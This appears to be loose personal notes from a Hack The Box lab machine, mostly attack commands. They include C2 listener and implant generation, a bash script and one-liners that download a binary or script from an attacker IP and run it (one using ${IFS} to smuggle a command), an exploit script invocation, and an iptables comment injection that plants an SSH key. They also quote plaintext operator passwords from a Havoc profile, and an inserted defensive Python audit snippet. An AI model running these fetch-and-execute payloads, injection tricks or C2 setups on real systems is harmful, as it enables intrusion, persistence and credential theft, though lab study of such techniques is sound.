Listener

https -L 10.10.14.68 -l 443
profiles new -b https://10.10.14.68:443 --arch x64 -o linux hackthebox64_linux
profiles generate hackthebox64_linux
mv $executable bad

#!/bin/bash

# Define the URL and local file name
URL="http://10.10.14.68/bad"
FILE_NAME="downloaded_binary"

# Download the file
curl -o "$FILE_NAME" "$URL"

# Check if the download was successful
if [ -f "$FILE_NAME" ]; then
    echo "Download successful."

    # Make the file executable
    chmod +x "$FILE_NAME"

    # Execute the file
    echo "Executing the file..."
    ./"$FILE_NAME"
else
    echo "Failed to download the file."
fi
wget http://10.10.14.93/bad.sh -O /tmp/bad.sh && sh /tmp/bad.sh
curl${IFS}10.10.14.93/bad.sh${IFS}|${IFS}bash

Enumeration

Discovered open port 22/tcp on 10.129.140.150
Discovered open port 443/tcp on 10.129.140.150
Discovered open port 8000/tcp on 10.129.140.150

2. Operators Section

  • Lists two user accounts with plaintext credentials:
    • User ilya: CobaltStr1keSuckz!
    • User sergej: 1w4nt2sw1tch2h4rdh4tc2
  • Security Implications:
    • Credentials are stored in plaintext and could be exploited if the file is accessed by unauthorized individuals.

3. Demon Configuration

  • Contains parameters for payload behavior:
    • Sleep (delay) and Jitter (randomization).
    • Process injection paths for 32-bit and 64-bit binaries (notepad.exe).

4. Listeners Section

  • Defines an HTTP listener named Demon Listener:
    • Binds to 127.0.0.1 on port 8443.
    • Host: backfire.htb (suggests it operates in a controlled environment).
    • Uses TLS (Secure = true).
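
An added example, not part of the original notes or of Havoc itself: a small audit that flags the plaintext operator passwords described in the Operators section without echoing them, and checks the listener bind and TLS settings from the Listeners section. The block layout, the key names (user, Password, HostBind, Secure) and all sample values are assumptions constructed for illustration.

```python
import re

# Constructed sample; the block layout and key names are assumed for illustration.
SAMPLE_PROFILE = """
Operators {
    user "alice" {
        Password = "example-password-1"
    }
    user "bob" {
        Password = "example-password-2"
    }
}
Listeners {
    Http {
        Name     = "Demo Listener"
        HostBind = "127.0.0.1"
        PortBind = 8443
        Secure   = true
    }
}
"""

USER_BLOCK = re.compile(r'user\s+"([^"]+)"\s*\{([^{}]*)\}')
PASSWORD = re.compile(r'\bPassword\s*=\s*"([^"]*)"')
HOST_BIND = re.compile(r'\bHostBind\s*=\s*"([^"]+)"')
SECURE = re.compile(r'\bSecure\s*=\s*(true|false)\b')
LOOPBACK = {"127.0.0.1", "::1", "localhost"}


def audit_profile(text):
    """Return (severity, message) findings; password values are never echoed."""
    findings = []
    for name, body in USER_BLOCK.findall(text):
        match = PASSWORD.search(body)
        if match:
            findings.append(("high", f'operator "{name}": plaintext password '
                                     f"({len(match.group(1))} chars, redacted)"))
    for host in HOST_BIND.findall(text):
        if host not in LOOPBACK:
            findings.append(("medium", f"listener bound to non-loopback {host}"))
    for value in SECURE.findall(text):
        if value == "false":
            findings.append(("medium", "listener has TLS disabled (Secure = false)"))
    return findings


if __name__ == "__main__":
    for severity, message in audit_profile(SAMPLE_PROFILE):
        print(f"[{severity}] {message}")
```
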

python3 exploit6.py --target https://10.129.140.150 -i 10.10.14.126 -p 80

Install Havoc

sudo apt install -y git build-essential apt-utils cmake libfontconfig1 libglu1-mesa-dev libgtest-dev libspdlog-dev libboost-all-dev libncurses5-dev libgdbm-dev libssl-dev libreadline-dev libffi-dev libsqlite3-dev libbz2-dev mesa-common-dev qtbase5-dev qtchooser qt5-qmake qtbase5-dev-tools libqt5websockets5 libqt5websockets5-dev qtdeclarative5-dev golang-go qtbase5-dev libqt5websockets5-dev python3-dev libboost-all-dev mingw-w64 nasm
cd teamserver
go mod download golang.org/x/sys
go mod download github.com/ugorji/go
cd ..
make ts-build
  • Copy the downloaded files
cp havoc.yaotl /opt/tools/Havoc/profiles/
# Run the teamserver
./havoc server --profile ./profiles/havoc.yaotl -v --debug
make client-build
# Run the client
./havoc client
sudo /usr/sbin/iptables -A INPUT -i lo -j ACCEPT -m comment --comment $'\nssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICzaWxLn0itXb7bpD3Yf7TcZVS6PdFYWAstQeyaH/Lzx user@parrot\n'